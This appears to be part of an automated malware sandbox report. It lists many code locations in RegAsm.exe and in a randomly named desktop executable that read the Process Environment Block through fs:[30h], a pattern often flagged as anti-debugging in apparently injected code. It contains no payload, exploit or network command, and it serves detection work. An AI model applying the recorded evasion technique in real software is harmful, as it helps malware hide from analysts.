Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E8D34 mov eax, dword ptr fs:[00000030h]	2_2_030E8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0309A537 mov eax, dword ptr fs:[00000030h]	2_2_0309A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03044D3B mov eax, dword ptr fs:[00000030h]	2_2_03044D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03044D3B mov eax, dword ptr fs:[00000030h]	2_2_03044D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03044D3B mov eax, dword ptr fs:[00000030h]	2_2_03044D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03053D43 mov eax, dword ptr fs:[00000030h]	2_2_03053D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03093540 mov eax, dword ptr fs:[00000030h]	2_2_03093540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030C3D40 mov eax, dword ptr fs:[00000030h]	2_2_030C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03037D50 mov eax, dword ptr fs:[00000030h]	2_2_03037D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303C577 mov eax, dword ptr fs:[00000030h]	2_2_0303C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303C577 mov eax, dword ptr fs:[00000030h]	2_2_0303C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]	2_2_03042581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]	2_2_03042581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]	2_2_03042581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]	2_2_03042581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]	2_2_03012D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]	2_2_03012D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]	2_2_03012D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]	2_2_03012D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]	2_2_03012D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304FD9B mov eax, dword ptr fs:[00000030h]	2_2_0304FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304FD9B mov eax, dword ptr fs:[00000030h]	2_2_0304FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E05AC mov eax, dword ptr fs:[00000030h]	2_2_030E05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E05AC mov eax, dword ptr fs:[00000030h]	2_2_030E05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030435A1 mov eax, dword ptr fs:[00000030h]	2_2_030435A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03041DB5 mov eax, dword ptr fs:[00000030h]	2_2_03041DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03041DB5 mov eax, dword ptr fs:[00000030h]	2_2_03041DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03041DB5 mov eax, dword ptr fs:[00000030h]	2_2_03041DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]	2_2_03096DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]	2_2_03096DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]	2_2_03096DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096DC9 mov ecx, dword ptr fs:[00000030h]	2_2_03096DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]	2_2_03096DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]	2_2_03096DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0302D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0302D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]	2_2_030DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]	2_2_030DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]	2_2_030DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]	2_2_030DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030C8DF1 mov eax, dword ptr fs:[00000030h]	2_2_030C8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]	2_2_030E740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]	2_2_030E740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]	2_2_030E740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]	2_2_03096C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]	2_2_03096C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]	2_2_03096C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]	2_2_03096C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]	2_2_030D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304BC2C mov eax, dword ptr fs:[00000030h]	2_2_0304BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304A44B mov eax, dword ptr fs:[00000030h]	2_2_0304A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AC450 mov eax, dword ptr fs:[00000030h]	2_2_030AC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AC450 mov eax, dword ptr fs:[00000030h]	2_2_030AC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303746D mov eax, dword ptr fs:[00000030h]	2_2_0303746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302849B mov eax, dword ptr fs:[00000030h]	2_2_0302849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E8CD6 mov eax, dword ptr fs:[00000030h]	2_2_030E8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D14FB mov eax, dword ptr fs:[00000030h]	2_2_030D14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]	2_2_03096CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]	2_2_03096CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]	2_2_03096CF0
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_05FD01CB mov eax, dword ptr fs:[00000030h]	4_2_05FD01CB
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_05FD00AD mov ecx, dword ptr fs:[00000030h]	4_2_05FD00AD
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_05FD00AD mov eax, dword ptr fs:[00000030h]	4_2_05FD00AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F22AE4 mov eax, dword ptr fs:[00000030h]	5_2_02F22AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F22ACB mov eax, dword ptr fs:[00000030h]	5_2_02F22ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]	5_2_02F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]	5_2_02F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2FAB0 mov eax, dword ptr fs:[00000030h]	5_2_02F2FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]	5_2_02EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]	5_2_02EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]	5_2_02EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]	5_2_02EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]	5_2_02EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2D294 mov eax, dword ptr fs:[00000030h]	5_2_02F2D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2D294 mov eax, dword ptr fs:[00000030h]	5_2_02F2D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F3927A mov eax, dword ptr fs:[00000030h]	5_2_02F3927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FAB260 mov eax, dword ptr fs:[00000030h]	5_2_02FAB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FAB260 mov eax, dword ptr fs:[00000030h]	5_2_02FAB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC8A62 mov eax, dword ptr fs:[00000030h]	5_2_02FC8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FBEA55 mov eax, dword ptr fs:[00000030h]	5_2_02FBEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]	5_2_02EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]	5_2_02EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]	5_2_02EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]	5_2_02EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F84257 mov eax, dword ptr fs:[00000030h]	5_2_02F84257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]	5_2_02F1A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F34A2C mov eax, dword ptr fs:[00000030h]	5_2_02F34A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F34A2C mov eax, dword ptr fs:[00000030h]	5_2_02F34A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F13A1C mov eax, dword ptr fs:[00000030h]	5_2_02F13A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FBAA16 mov eax, dword ptr fs:[00000030h]	5_2_02FBAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FBAA16 mov eax, dword ptr fs:[00000030h]	5_2_02FBAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFAA16 mov eax, dword ptr fs:[00000030h]	5_2_02EFAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFAA16 mov eax, dword ptr fs:[00000030h]	5_2_02EFAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F08A0A mov eax, dword ptr fs:[00000030h]	5_2_02F08A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]	5_2_02EF5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF5210 mov ecx, dword ptr fs:[00000030h]	5_2_02EF5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]	5_2_02EF5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]	5_2_02EF5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]	5_2_02F203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]	5_2_02F203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]	5_2_02F203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]	5_2_02F203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]	5_2_02F203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]	5_2_02F203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1DBE9 mov eax, dword ptr fs:[00000030h]	5_2_02F1DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]	5_2_02FA23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]	5_2_02FA23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FA23E3 mov eax, dword ptr fs:[00000030h]	5_2_02FA23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F753CA mov eax, dword ptr fs:[00000030h]	5_2_02F753CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F753CA mov eax, dword ptr fs:[00000030h]	5_2_02F753CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC5BA5 mov eax, dword ptr fs:[00000030h]	5_2_02FC5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F24BAD mov eax, dword ptr fs:[00000030h]	5_2_02F24BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F24BAD mov eax, dword ptr fs:[00000030h]	5_2_02F24BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F24BAD mov eax, dword ptr fs:[00000030h]	5_2_02F24BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2B390 mov eax, dword ptr fs:[00000030h]	5_2_02F2B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F22397 mov eax, dword ptr fs:[00000030h]	5_2_02F22397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB138A mov eax, dword ptr fs:[00000030h]	5_2_02FB138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2138B mov eax, dword ptr fs:[00000030h]	5_2_02F2138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2138B mov eax, dword ptr fs:[00000030h]	5_2_02F2138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2138B mov eax, dword ptr fs:[00000030h]	5_2_02F2138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FAD380 mov ecx, dword ptr fs:[00000030h]	5_2_02FAD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F01B8F mov eax, dword ptr fs:[00000030h]	5_2_02F01B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F01B8F mov eax, dword ptr fs:[00000030h]	5_2_02F01B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F23B7A mov eax, dword ptr fs:[00000030h]	5_2_02F23B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F23B7A mov eax, dword ptr fs:[00000030h]	5_2_02F23B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFDB60 mov ecx, dword ptr fs:[00000030h]	5_2_02EFDB60
